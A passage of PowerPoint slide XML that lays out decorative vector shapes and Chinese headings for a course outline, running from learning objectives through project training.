                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
